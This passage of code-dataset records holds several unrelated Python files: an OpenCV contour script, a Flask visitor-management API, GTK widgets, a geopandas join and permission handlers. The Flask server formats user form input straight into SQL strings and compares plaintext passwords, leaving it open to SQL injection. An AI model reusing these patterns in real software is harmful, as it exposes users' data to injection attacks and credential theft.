Upper\n\ncc = {H: {l: 50, u: 93},\n S: {l: 25, u: 255},\n L: {l: 34, u: 149},\n R: {l: 64, u: 212},\n G: {l: 206, u: 255},\n B: {l: 126, u: 255}}\n\n# print (cc[H][l], cc[S][l], cc[L][l])\n# print (cc[H][u], cc[S][u], cc[L][u])\n# print (cc[R][l], cc[G][l], cc[B][l])\n# print (cc[R][u], cc[G][u], cc[B][u])\n# a = threshHSL(srcImg, [cc[H][l], cc[S][l], cc[L][l]],\n# [cc[H][u], cc[S][u], cc[L][u]]) # HSL thresh lower/upper\n# if debug:\n# print (\"HSL: \" + str(format(time.time() - start, '.5f')))\n# start = time.time()\n# b = threshRGB(srcImg, [cc[R][l], cc[G][l], cc[B][l]],\n# [cc[R][u], cc[G][u], cc[B][u]]) # RGB lower/upper\n\n# Note: System arguments should take the form of an IP address of the video\n# capture feed\n\n# srcImg = cv2.VideoCapture() # Define srcImg as image/video capture\n#\n# if len(sys.argv) != 2:\n# print(\"Error: specify an URL to connect to\")\n# exit(0)\n#\n# url = sys.argv[1]\n#\n# srcImg.open(\"http://127.0.0.1:8080/stream.wmv\")\n# ret, frameImg = srcImg.read() # Test\n# imgY, imgX, imgChannels = frameImg.shape\n\nsrcImg = cv2.imread(\"/home/solomon/frc/the-deal/pythonCV/RealFullField/\" +\n sys.argv[1] + \".jpg\", 1)\n# print (srcImg.shape)\nif debug:\n print (\"Read image: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\n\n\ndef percentFromResolution(srcImg, yTargetRes, xTargetRes):\n imgY, imgX, imgChannels = srcImg.shape\n modPercentX = float(xTargetRes) / imgX\n modPercentY = float(yTargetRes) / imgY\n return [modPercentY, modPercentX]\n\n\ndef imgScale(toScale, percentX, percentY):\n scaledImg = cv2.resize(toScale, None, fx=percentX, fy=percentY,\n interpolation=cv2.INTER_CUBIC) # MaybeTry INTER_AREA\n return scaledImg\n\n\ndef threshHSL(imgSrc, lower, upper):\n \"\"\"Returns binary mask of image based on HSL bounds\"\"\"\n imgSrcHLS = cv2.cvtColor(imgSrc, cv2.COLOR_BGR2HLS)\n npLower = np.array([lower[0], lower[2], lower[1]]) # Compesate for HLSvsHSL\n npUpper = np.array([upper[0], upper[2], upper[1]])\n tmp = cv2.inRange(imgSrcHLS, npLower, npUpper)\n return tmp\n\n\ndef threshRGB(imgSrc, lower, upper):\n \"\"\"Returns binary mask of image based on RGB bounds\"\"\"\n imgSrcRGB = cv2.cvtColor(imgSrc, cv2.COLOR_BGR2RGB)\n npLower = np.array([lower[0], lower[1], lower[2]])\n npUpper = np.array([upper[0], upper[1], upper[2]])\n tmp = cv2.inRange(imgSrcRGB, npLower, npUpper)\n return tmp\n\n\ndef cvAdd(img1, img2):\n \"\"\"Returns addition of 2 images\"\"\"\n tmp = cv2.add(img1, img2)\n return tmp\n\n\ndef findContours(img):\n \"\"\"Finds contours in image, preferably binary image\"\"\"\n ret, contours, hierarchy = \\\n cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n return contours, hierarchy\n\nif debug:\n print (\"function defs: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\n\n# srcImg = imgScale(srcImg, percentFromResolution(srcImg, 240, 320)[0],\n# percentFromResolution(srcImg, 240, 320)[1])\nmultiplier = 1\nsrcImg = imgScale(srcImg, percentFromResolution(srcImg,\n srcImg.shape[0]*multiplier,\n srcImg.shape[1]*multiplier)[0],\n percentFromResolution(srcImg,\n srcImg.shape[0]*multiplier,\n srcImg.shape[1]*multiplier)[1])\n# srcImg = cv2.resize(srcImg, None, fx=.5, fy=.5, interpolation=cv2.INTER_CUBIC)\n\nif debug:\n print (\"Scale: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\nsrcImg = cv2.GaussianBlur(srcImg, (5, 5), 5)\nif debug:\n print (\"Blur: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\n\na = threshHSL(srcImg, [cc[H][l], cc[S][l], cc[L][l]],\n [cc[H][u], cc[S][u], cc[L][u]]) # HSL thresh lower/upper\nif debug:\n print (\"HSL: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\nb = threshRGB(srcImg, [cc[R][l], cc[G][l], cc[B][l]],\n [cc[R][u], cc[G][u], cc[B][u]]) # RGB lower/upper\nif debug:\n print (\"RGB: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\nc = cvAdd(a, b)\nif debug:\n print (\"Add: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\nd = c\ncontours, hiearchy = findContours(d)\nif debug:\n print (\"Contours: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\n\n\ntmpVar = 0\n\n# while len(contours) > 1: # this inefficient mess finds the biggest contour\n# # (I think)\n# for z in range(0, len(contours)):\n# try:\n# if cv2.contourArea(contours[z]) <= tmpVar:\n# contours.pop(z)\n# except IndexError:\n# break\n# # print (str(tmpVar) + \": \" + str(len(contours)) + \": \" + str(z))\n# tmpVar += 1\n#\n# if debug:\n# print (\"Found biggest: \" + str(format(time.time() - start, '.5f')))\n# start = time.time()\n\n# for x in contours:\n# print (cv2.contourArea(x))\n\n# print(\"\\n\")\n\ncontoursSorted = sorted(contours,\n key=lambda x: cv2.contourArea(x), reverse=True)\n# print (contours[0])\n# print (contoursSorted)\ncontours = contoursSorted[0:5]\n\n\nif debug:\n print (\"Found biggest w/ better algorithm: \" + str(format(time.time() -\n start, '.5f')))\n start = time.time()\n\n\n# rect = cv2.minAreaRect(contours[0])\n# box = cv2.cv.BoxPoints(rect)\n# box = np.int0(box)\n# cv2.drawContours(srcImg, [box], 0, (0, 255, 0), 2)\n#\n# rows, cols = srcImg.shape[:2]\n# [vx, vy, x, y] = cv2.fitLine(contours[0], cv2.cv.CV_DIST_L2, 0, 0.01, 0.01)\n# lefty = int((-x*vy/vx) + y)\n# righty = int(((cols-x)*vy/vx)+y)\n# cv2.line(srcImg, (cols-1, righty), (0, lefty), (255, 0, 0), 2)\n\nhull = cv2.convexHull(contours[0], returnPoints=True)\nif debug:\n print (\"Convex hull: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\n\n(count, _, _) = hull.shape\nhull.ravel()\nhull.shape = (count, 2)\n\n\ntmpVar = 0\nitera = 0\nmaxIter = 256\niii = len(cv2.approxPolyDP(hull, tmpVar, True))\nwhile iii != 4:\n if iii > 4:\n tmpVar += 1\n elif iii < 4:\n tmpVar -= 1\n itera += 1\n if itera >= maxIter:\n break\n iii = len(cv2.approxPolyDP(hull, tmpVar, True))\n\napprox = cv2.approxPolyDP(hull, tmpVar, True)\n\nif debug:\n print (\"Found quadrangle: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\n\n# if debug:\ncv2.drawContours(srcImg, contours, -1, (0, 0, 255), 1)\ncv2.polylines(srcImg, np.int32([hull]), True, (0, 255, 0), 1)\ncv2.drawContours(srcImg, approx, -1, (0, 255, 0), 3)\n\nfor x in range(0, len(approx)):\n # print (x)\n # print (approx[x][0][0])\n cv2.putText(srcImg,\n \" \" + str(x) + \": (\" + str(approx[x][0][0]) +\n \", \" + str(approx[x][0][1]) + \")\",\n (approx[x][0][0], approx[x][0][1]),\n cv2.FONT_HERSHEY_PLAIN, 1, (0, 255, 255), 1)\n\nif debug:\n print (\"Drew image: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\n\n\ndef imgUntilQ(srcImg):\n cv2.imshow('e', srcImg)\n while True:\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n cv2.destroyAllWindows()\n\nif debug:\n print (\"Wrote image: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\n\nif fileWrite:\n cv2.imwrite(fWPath, srcImg)\n# Starting to calculate stuff for NT publishing.\n# Items to be published:\n# Center of box/contour (maybe avg them)\n# 4 points\n# Slopes of angles of sides of box\n# Box height\n# Box width\n# Planned output:\n# [center, (p1, p2, p3, p4), (Mp1, Mp2, Mp3, Mp4), (height, width)]\n\n\np1, p2, p3, p4 = [approx[0][0][0], approx[0][0][1]], \\\n [approx[1][0][0], approx[1][0][1]], \\\n [approx[2][0][0], approx[2][0][1]], \\\n [approx[3][0][0], approx[3][0][1]]\nxSize = 0\nySize = 0\npointArr = [p1, p2, p3, p4]\n\nleftPoints = sorted(pointArr)[:2]\nrightPoints = sorted(pointArr)[2:]\ntopPoints = sorted(sorted(pointArr, key=lambda x: x[1])[:2])\nbottomPoints = sorted(sorted(pointArr, key=lambda x: x[1])[2:])\n\nxSize = sorted(pointArr)[-1][0] - sorted(pointArr)[0][0]\nySize = sorted(pointArr, key=lambda x: x[1], reverse=True)[0][1] - \\\n sorted(pointArr, key=lambda x: x[1])[0][1]\n\napproxMoments = cv2.moments(approx)\ncontourMoments = cv2.moments(contours[0])\napproxCentroidY = int(approxMoments['m01']/approxMoments['m00'])\napproxCentroidX = int(approxMoments['m10']/approxMoments['m00'])\ncv2.circle(srcImg, (approxCentroidX, approxCentroidY), 5, (255, 0, 255))\n\n# print (p1, p2, p3, p4)\n\nleftSlope, rightSlope, topSlope, bottomSlope = \\\n format((leftPoints[1][1] - leftPoints[0][1]) /\n float(leftPoints[1][0] - leftPoints[0][0]), '.2f'),\\\n format((rightPoints[1][1] - rightPoints[0][1]) /\n float(rightPoints[1][0] - rightPoints[0][0]), '.2f'),\\\n format((topPoints[1][1] - topPoints[0][1]) /\n float(topPoints[1][0] - topPoints[0][0]), '.2f'),\\\n format((bottomPoints[1][1] - bottomPoints[0][1]) /\n float(bottomPoints[1][0] - bottomPoints[0][0]), '.2f')\n\n# print (leftPoints[1][1], leftPoints[0][1])\n# print (leftPoints[1][0], leftPoints[0][0])\n# print (leftSlope, rightSlope, topSlope, bottomSlope)\n\n\nfinalDict = {}\n\nfinalDict[\"approxCentroidX\"] = int(approxCentroidX)\nfinalDict[\"approxCentroidY\"] = int(approxCentroidY)\n\nfinalDict[\"xSize\"] = int(xSize)\nfinalDict[\"ySize\"] = int(ySize)\n\nfinalDict[\"p1\"] = (int(p1[0]), int(p1[1]))\nfinalDict[\"p2\"] = (int(p2[0]), int(p2[1]))\nfinalDict[\"p3\"] = (int(p3[0]), int(p3[1]))\nfinalDict[\"p4\"] = (int(p4[0]), int(p4[1]))\n\nfinalDict[\"leftSlope\"] = float(leftSlope)\nfinalDict[\"rightSlope\"] = float(rightSlope)\nfinalDict[\"topSlope\"] = float(topSlope)\nfinalDict[\"bottomSlope\"] = float(bottomSlope)\n# print (str(leftSlope) + \", \" + str(rightSlope) + \", \" + str(topSlope) + \", \" +\n# str(bottomSlope))\n\n# Side slopes\nif debug:\n print (\"Made dict: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\n\nwith open(serialFile, 'wb') as j:\n # pickle.dump(finalList, j)\n pickle.dump(finalDict, j, 2)\n\nif debug:\n print (\"Dumped pickle: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\n print (\"Total time: \" + str(time.time() - e))\n\nif displayProcessed:\n imgUntilQ(srcImg)\n","sub_path":"pythonCV/mjpgToConvex.py","file_name":"mjpgToConvex.py","file_ext":"py","file_size_in_byte":10822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"316325678","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 3 16:18:42 2019\n@author: akshay72\n\"\"\"\nimport psycopg2,config_parser\nfrom flask import Flask , request,jsonify\n\nstart_time=\"\"\nend_time=\"\"\n\napp = Flask(__name__)\nparams = config_parser.config(filename='db_config/database.ini', section='postgresql')\nqueries = config_parser.config(filename='db_config/database.ini', section='queries')\n\ntry:\n # connect to the PostgreSQL server\n conn = psycopg2.connect(**params)\n cur = conn.cursor()\nexcept psycopg2.DatabaseError as error:\n jsonify(error)\n \n \ndef replace(data):\n if(data is not None):\n return data\n data=None\n return data\n\n\n@app.route('/society_info',methods=['GET','POST'])\ndef society_info():\n try:\n query=queries['suggest_id_name']\n cur.execute(query)\n result=cur.fetchall()\n return jsonify(result)\n except psycopg2.DatabaseError as error:\n errors={'society info':False,\n 'error':(error)\n }\n return str(errors)\n \n\n \n \n@app.route('/get_id',methods=['GET','POST'])\ndef get_id():\n try:\n regd_no=request.form['regd_no']\n query_society_id=queries['get_society_id']\n query=query_society_id.format(regd_no)\n cur.execute(query)\n conn.commit()\n return jsonify(cur.fetchone())\n except psycopg2.DatabaseError as error:\n errors={'registeration':False,\n 'error':(error)\n }\n return str(errors)\n\n \n@app.route('/society_register', methods=['GET','POST'])\ndef society_register():\n try:\n #society details\n regd_no=request.form['regd_no']\n building_name=request.form['society_name']\n building_address=request.form['society_address']\n total_buildings=request.form['total_buildings']\n total_flats=request.form['total_flats']\n society_register_query=queries['society_register']\n query=society_register_query.format(str(regd_no),str(building_name),str(building_address),int(total_buildings),int(total_flats))\n cur.execute(query)\n conn.commit()\n #first user details\n return jsonify(\"society registered succesfully\")\n except psycopg2.DatabaseError as error:\n errors={'society registeration':False,\n 'error':(error)\n }\n return str(errors)\n \ndef generate(first,last):\n return first+last\n\n#staff Registeration (staff may be watchman or secretary)\n@app.route('/user/register', methods=['GET','POST'])\ndef register():\n create_user=queries['create_user']\n try:\n #username=request.form['username']\n email=request.form['email']\n first_name=request.form['first_name']\n middle_name=request.form['middle_name']\n last_name=request.form['last_name']\n password=request.form['password']\n society_id=request.form['society_id']\n isadmin=request.form['isadmin']\n username=generate(first_name,last_name)\n postgres_insert_query=create_user.format(str(username),str(email),str(first_name),str(middle_name),str(last_name),str(password),str(society_id),str(isadmin))\n cur.execute(postgres_insert_query)\n conn.commit()\n return \"User registered Succesfully\"\n except psycopg2.DatabaseError as error:\n errors={'registeration':False,\n 'error':(error)\n }\n return str(errors)\n\n#staff Login\n@app.route('/user/login',methods=['GET','POST'])\ndef login():\n validate_query=queries['validate_user']\n \n username=request.form['email']\n password=request.form['password']\n postgres_user_login_query=validate_query.format(username,password)\n cur.execute(postgres_user_login_query)\n return jsonify(cur.fetchone())\n\n# visitor entry from staff\n@app.route('/insertVisitor',methods=['GET','POST'])\ndef visitor_entry():\n insert_visitor=queries['insert_visitor']\n try:\n first_name=request.form['first_name']\n contact_number=request.form['contact_number']\n entry_time=request.form['entry_time']\n #entry_time=datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n flat_info=request.form['visiting_flat_no']\n last_name=replace(request.form['last_name'])\n #middle_name=replace(request.form['middle_name'])\n staff_name=request.form['staff_id']\n visit_reason=request.form['visit_reason']\n society_id=request.form['society_id']\n postgres_visitor_insert_query=insert_visitor.format(str(first_name),str(last_name),int(contact_number),str(entry_time),str(flat_info),int(staff_name),str(visit_reason),int(society_id))\n cur.execute(postgres_visitor_insert_query)\n conn.commit()\n success=True\n return jsonify(success)\n\n except psycopg2.DatabaseError as error:\n errors={'visitor_entry':False,\n 'error':(error)\n }\n return str(errors)\n # middle_name ,contact_number ,flat_info\n\n@app.route('/update_exit',methods=['GET','POST'])\ndef update_exit():\n #update_exit=queries['update_exit']\n visitor_id=request.form['id']\n exit_time=request.form['exit_time']\n try:\n update_query='''update visitor_management_schema.visitor_table set exit_time='{}' where id={}'''.format(exit_time,visitor_id)\n cur.execute(update_query)\n conn.commit()\n success=True\n except:\n success=False\n return jsonify(success)\n \n\n# admin access\n@app.route('/dashboard_count',methods=['GET','POST'])\ndef dashboard_data():\n non_admin_user=queries['non_admin_user_count']\n total_visitor_count=queries['total_visitor_count']\n society_id=request.form['society_id']\n postgres_visitor_count=total_visitor_count.format(society_id)\n postgres_watchman_count=non_admin_user.format(society_id)\n cur.execute(postgres_watchman_count)\n watchman_count=cur.fetchone()\n cur.execute(postgres_visitor_count)\n \n visitor_count=cur.fetchone()\n return jsonify({'watchman_count':watchman_count[0],'visitor_count':visitor_count[0]})\n\n#admin access\n@app.route('/dashboard_watchman',methods=['GET','POST'])\ndef dashboard_watchman():\n admin_user=queries['non_admin_user']\n society_id=request.form['society_id']\n postgres_admin=admin_user.format(society_id)\n cur.execute(postgres_admin)\n user=cur.fetchall()\n return jsonify({'user':user})\n\n@app.route('/dashboard_visitor',methods=['GET','POST'])\ndef dashboard_visitor():\n all_visitor_details=queries['all_visitor_details']\n society_id=request.form['society_id']\n postgres_watchman=all_visitor_details.format(society_id)\n cur.execute(postgres_watchman)\n user=cur.fetchall()\n return jsonify({'user':(user)})\n \n@app.route('/',methods=['GET','POST'])\ndef hello_worlds():\n return \"
\"\n \n\n@app.route('/mayur',methods=['GET','POST'])\ndef hello_world():\n return \"
Hello World! This is Mayur mia
\"\n\n@app.route('/mia',methods=['GET','POST'])\ndef hello():\n return \"Hello World! This is Akshay mia\"\n\n@app.route('/raj',methods=['GET','POST'])\ndef hellos():\n return \"Hello World! This is Raj mia\"\n\n@app.route('/about',methods=['GET','POST'])\ndef about():\n return jsonify({'Company':'Visitor Management',\n 'Dev center':'Team Foundation',\n 'version':'heroku test development'})\n\n@app.route('/id',methods=['GET','POST'])\ndef helloid():\n cur.execute('select * from visitor_management.test;')\n result=cur.fetchall()\n return jsonify(result) \n\n\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":7634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"126258304","text":"import gi\ngi.require_version('Gtk', '3.0')\n#gi.require_version('Granite', '1.0')\nfrom gi.repository import Gtk\n\nclass FormatBar(Gtk.Box):\n\n\tdef __init__(self):\n\n\t\tGtk.Box.__init__(self)\n\t\tGtk.StyleContext.add_class(self.get_style_context(), \"linked\")\n\n\t\t#bold\n\t\tself.bold = Gtk.ToggleButton()\n\t\timage = Gtk.Image.new_from_icon_name(\"format-text-bold-symbolic\", Gtk.IconSize.MENU)\n\t\timage.show()\n\t\tself.bold.add(image)\n\t\tself.bold.set_tooltip_text(\"Bold\")\n\n\t\t#Italic\n\t\tself.italic = Gtk.ToggleButton()\n\t\timage = Gtk.Image.new_from_icon_name(\"format-text-italic-symbolic\", Gtk.IconSize.MENU)\n\t\timage.show()\n\t\tself.italic.add(image)\n\t\tself.italic.set_tooltip_text(\"Italic\")\n\n\t\t#Underline\n\t\tself.underline = Gtk.ToggleButton()\n\t\timage = Gtk.Image.new_from_icon_name(\"format-text-underline-symbolic\", Gtk.IconSize.MENU)\n\t\timage.show()\n\t\tself.underline.add(image)\n\t\tself.underline.set_tooltip_text(\"Underline\")\n\n\t\t#ubuntu font\n\t\tself.ubuntu = Gtk.ToggleButton.new_with_label(\"Ubuntu Mono\")\n\n\t\t#font size\n\t\t#self.size = Gtk.Entry()\n\t\t#self.size.set_text(str(12))\n\t\t#self.size.set_max_width_chars(4)\n\t\t#self.size.set_width_chars(4)\n\t\t#self.size.set_max_length(2)\n\n\n\t\t#justification\n\t\tself.just_left = Gtk.Button()\n\t\timage = Gtk.Image.new_from_icon_name(\"format-justify-left-symbolic\",Gtk.IconSize.MENU)\n\t\timage.show()\n\t\tself.just_left.add(image)\n\t\tself.just_left.set_tooltip_text(\"Left Justification (Select the entire line)\")\n\n\t\tself.just_center = Gtk.Button()\n\t\timage = Gtk.Image.new_from_icon_name(\"format-justify-center-symbolic\",Gtk.IconSize.MENU)\n\t\timage.show()\n\t\tself.just_center.add(image)\n\t\tself.just_center.set_tooltip_text(\"Center Justification (Select the entire line)\")\n\n\t\tself.just_right = Gtk.Button()\n\t\timage = Gtk.Image.new_from_icon_name(\"format-justify-right-symbolic\",Gtk.IconSize.MENU)\n\t\timage.show()\n\t\tself.just_right.add(image)\n\t\tself.just_left.set_tooltip_text(\"Left Justification (Select the entire line)\")\n\n\t\tself.just_fill = Gtk.Button()\n\t\timage = Gtk.Image.new_from_icon_name(\"format-justify-fill-symbolic\",Gtk.IconSize.MENU)\n\t\timage.show()\n\t\tself.just_fill.add(image)\n\t\tself.just_fill.set_tooltip_text(\"Fill Justification (Select the entire line)\")\n\t\t\n\n\n\t\tself.title = Gtk.Button.new_with_label(\"Title\")\n\n\t\tself.header = Gtk.Button.new_with_label(\"Header\")\n\n\t\tself.buttons = {}\n\t\tself.buttons['bold'] = self.bold\n\t\tself.buttons['italic'] = self.italic\n\t\tself.buttons['underline'] = self.underline\n\t\tself.buttons['ubuntu'] = self.ubuntu\n\t\t#self.buttons['just_left'] = self.just_left\n\t\t#self.buttons['just_right'] = self.just_right\n\t\t#self.buttons['just_center'] = self.just_center\n\t\t#self.buttons['just_fill'] = self.just_fill\n\t\t#self.buttons['size'] = self.size\n\n\t\tself.pack_end(self.header,False,False,0)\n\t\tself.pack_end(self.title,False,False,0)\n\t\tself.pack_end(self.just_fill,False,False,0)\n\t\tself.pack_end(self.just_right, False, False,0)\n\t\tself.pack_end(self.just_center, False, False,0)\n\t\tself.pack_end(self.just_left, False, False,0)\n\t\tself.pack_end(self.ubuntu,False,False,0)\n\t\tself.pack_end(self.underline,False,False,0)\n\t\tself.pack_end(self.italic,False,False,0)\n\t\tself.pack_end(self.bold,False,False,0)","sub_path":"format_toolbar.py","file_name":"format_toolbar.py","file_ext":"py","file_size_in_byte":3137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"417289313","text":"import gtk\nfrom grafeo.config import Paths\n\nclass MainWindow(gtk.Window):\n def __init__(self):\n gtk.Window.__init__(self)\n\n self.set_title('Grafeo')\n self.set_size_request(600, 400)\n self.set_default_size(600, 400)\n self.set_icon_from_file(Paths.get_img_filename('grafeo.svg'))\n\n builder = gtk.Builder()\n builder.add_from_file(Paths.get_gtk_ui_filename('MainVBox.ui'))\n\n self.mainVBox = builder.get_object('mainVBox')\n\n self.add(self.mainVBox)\n","sub_path":"Projects/grafeo_archive/grafeo_20100227_python/grafeo/ui/gtk/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"241025618","text":"def outer(add):\r\n print(\"Welcome User\")\r\n pin = input(\"Enter your PIN: \")\r\n if pin == \"1234\":\r\n print(\"Welcome Ram\")\r\n else:\r\n print(\"Wrong PIN\")\r\n\r\n return add\r\n\r\n\r\n@outer\r\ndef caller():\r\n total_bal = 0\r\n amount = int(input(\"Enter amount you want to withdraw : \"))\r\n total_bal += amount\r\n\r\ncaller()\r\n","sub_path":"05-Functions/10-UsingDecorators.py","file_name":"10-UsingDecorators.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"549362363","text":"import pandas as pd\nimport numpy as np\nimport geopandas as gpd\n\n# Import Denver faces, check extent and CRS\nfaces = gpd.read_file(\n \"denver_tiger/tl_2017_08031_faces/tl_2017_08031_faces.shp\")\nprint('FACES DATA:')\nprint('Extent: ', faces.total_bounds)\nprint('CRS: ', faces.crs)\n\n# Import Denver addresses, check extent and CRS\naddresses = gpd.read_file(\n \"den_addresses/addresses.shp\")\nprint('\\nADDRESS DATA:')\nprint('Extent: ', addresses.total_bounds)\nprint('CRS: ', addresses.crs)\nprint(addresses.shape)\n\n# Reproject address data\nadd_reproj = addresses.to_crs({'init': 'epsg:4269'})\n\n# Points within blocks\njoined_data = gpd.sjoin(add_reproj,\n faces,\n how=\"inner\",\n op='intersects')\ndf = joined_data[['PREDIRECTI','STREET_NAM','POSTTYPE']]\ndf = df.apply(lambda row: None if row.isnull().all() else ' '.join(row.dropna()), axis=1)\njoined_data.loc[:,'MAF_NAME'] = df\njoined_data.loc[:,'BLKID'] = (joined_data['STATEFP10'] + joined_data['COUNTYFP10'] + joined_data['TRACTCE10'] + joined_data['BLOCKCE10']).astype(str)\njoined_data = joined_data[['LATITUDE', 'LONGITUDE', 'MAF_NAME', 'BLKID']]\nprint(joined_data.shape)\nprint(joined_data.head())\njoined_data.to_csv('den_addresses.csv')\n","sub_path":"add_join.py","file_name":"add_join.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"652795479","text":"#!/usr/bin/env python\n# -*- encoding:utf-8 -*-\n\nimport json\nimport time\nimport hashlib\nimport traceback\nimport cPickle as pickle\nfrom bson import ObjectId\n\nfrom core.web import HandlerBase, OpenHandlerBase\nfrom framework.mvc.web.requesthandler import RequestHandler as OpenRequestHandler\nfrom core.platform.user import UserManage, sign as UserSign\n\nfrom framework.mvc.web import url\nfrom framework.data.mongo.utils import json2ObjectId\nfrom framework.data import metadb as mdb,sys_db\nfrom framework.web.paging import Paging, skip\n\nfrom settings import settings\n\nclass Result(dict):\n pass\n\ndef make_msg(code, msg='成功', data={}):\n status = True if code == 200 else False\n return Result({'status': status, 'statusCode': code, 'message': msg, 'data': data})\n\nclass Permission(object):\n\n def get(self, handler, option, _querys=None):\n self.handler = handler\n if _querys is None:\n _querys = json.loads(handler.get_argument('querys'))\n\n system_id = handler.get_argument('system_id', None)\n self.user_api = UserManage()\n\n querys = []\n for item in _querys:\n if item.get('fields'):\n item = item['fields']\n querys.append(item)\n\n querys = filter_from_system(self.user_api, querys, system_id)\n\n if not querys:\n return self.handler.json({})\n\n if option == 'has':\n return self._has(querys)\n\n elif option == 'getnames':\n return self._get_names(querys)\n\n elif option == 'get':\n return self._get(querys)\n\n elif option == 'getall':\n return self._get_all(querys)\n\n elif option == 'allow':\n return self._allow(querys)\n\n elif option == 'deny':\n return self._deny(querys)\n\n elif option == 'update':\n return self._update(querys)\n\n elif option == 'getmetadata':\n return self._get_metadata(querys)\n\n elif option == 'setmetadata':\n return self._set_metadata(querys)\n\n def _get_names(self, querys):\n results = []\n\n for query in querys:\n\n oid = query['oid']\n\n try:\n mongoid = ObjectId(oid)\n except:\n continue\n\n if mdb.page.find({'_id': mongoid}).count() == 1:\n results[oid] = {'visit': '访问'};\n elif mdb.object.find({'_id': mongoid}).count() == 1:\n results[oid] = {'new': '新建', 'edit': '修改', 'find': '查询', 'remove': '删除'}\n elif mdb.layout.find({'_id': mongoid}).count() == 1:\n results[oid] = {'visit': '访问'};\n else:\n results[oid] = {'visit': '访问'};\n\n return results\n\n def _has(self, querys):\n results = []\n for query in querys:\n key = query['key']\n results.append(self.user_api.has_permissions(key, query['oid'], query['permissionNames']))\n return results\n\n def _get(self, querys):\n results = []\n for query in querys:\n key = query['key']\n results.append(self.user_api.get_permissions(key, query['oid'], query.get('permissionNames'), skip_special=True))\n return results\n\n def _get_all(self, querys):\n results = []\n for query in querys:\n key = query['key']\n oid = query['oid']\n\n # 继承权限\n permission = self.user_api.get_permissions(key, oid, query.get('permissionNames'), skip_special=True)\n\n # 不继承权限\n spermission = self.user_api.get_spermissions(key, oid, query.get('permissionNames'))\n\n results.append({'permission': permission, 'spermission': spermission})\n\n return results\n\n def _allow(self, querys):\n results = []\n current_user = str(self.handler.current_user['current_user']['_id'])\n for query in querys:\n key = query['key']\n self.user_api.allow_permission(current_user, key, query['oid'], query['permissionNames'])\n results.append(True)\n\n return results\n\n def _deny(self, querys):\n results = []\n current_user = str(self.handler.current_user['current_user']['_id'])\n for query in querys:\n key = query['key']\n self.user_api.deny_permission(current_user, key, query['oid'], query['permissionNames'])\n results.append(True)\n\n return results\n\n def _update(self, querys):\n results = []\n current_user = str(self.handler.current_user['current_user']['_id'])\n for query in querys:\n key = query['key']\n if key not in results:\n results[key] = {}\n\n names = query['permissionNames']\n if isinstance(names, dict):\n names = [key for key, value in names.items() if value]\n\n self.user_api.update_permissions(current_user, key, query['oid'], names)\n results.append(True)\n\n return results\n\n def _set_metadata(self, querys):\n results = []\n for query in querys:\n key = query['key']\n namespace = query['namespace']\n results.append(self.user_api.set_metadata(key, namespace, query['data']))\n\n return results\n\n def _get_metadata(self, querys):\n results = []\n for query in querys:\n key = query['key']\n namespace = query['namespace']\n results.append(self.user_api.get_metadata(key, namespace))\n\n return results\n\nclass SPermission(object):\n\n def get(self, handler, option, _querys=None):\n self.handler = handler\n if _querys is None:\n _querys = json.loads(handler.get_argument('querys'))\n\n system_id = handler.get_argument('system_id', None)\n querys = []\n for item in _querys:\n if item.get('fields'):\n item = item['fields']\n querys.append(item)\n\n self.user_api = UserManage()\n\n querys = filter_from_system(self.user_api, querys, system_id)\n\n if not querys:\n return self.handler.json({})\n\n if option == 'get':\n return self._get(querys)\n\n elif option == 'allow':\n return self._allow(querys)\n\n elif option == 'deny':\n return self._deny(querys)\n\n elif option == 'update':\n return self._update(querys)\n\n def _get(self, querys):\n results = []\n for query in querys:\n oid = query['oid']\n key = query['key']\n\n results.append(self.user_api.get_spermissions(key, oid, query.get('permissionNames')))\n\n return results\n\n def _allow(self, querys):\n results = []\n current_user = str(self.handler.current_user['current_user']['_id'])\n for query in querys:\n oid = query['oid']\n key = query['key']\n\n self.user_api.allow_spermission(current_user, key, oid, query['permissionNames'])\n results.append(True)\n\n return results\n\n def _deny(self, querys):\n results = []\n current_user = str(self.handler.current_user['current_user']['_id'])\n for query in querys:\n oid = query['oid']\n key = query['key']\n self.user_api.deny_spermission(current_user, key, oid, query['permissionNames'])\n results.append(True)\n\n return results\n\n def _update(self, querys):\n results = []\n current_user = str(self.handler.current_user['current_user']['_id'])\n for query in querys:\n oid = query['oid']\n key = query['key']\n\n names = query['permissionNames']\n if isinstance(names, dict):\n names = [key for key, value in names.items() if value]\n\n self.user_api.update_spermissions(current_user, key, oid, names)\n results.append(True)\n\n return results\n\nclass User(object):\n\n def get(self, handler, option, _querys=None):\n self.handler = handler\n system_id = handler.get_argument('system_id', None)\n if _querys is None:\n _querys = json.loads(handler.get_argument('querys'))\n querys = []\n for item in _querys:\n if item.get('fields'):\n item = item['fields']\n querys.append(item)\n\n self.user_api = UserManage()\n\n querys = filter_from_system(self.user_api, querys, system_id)\n\n if option == 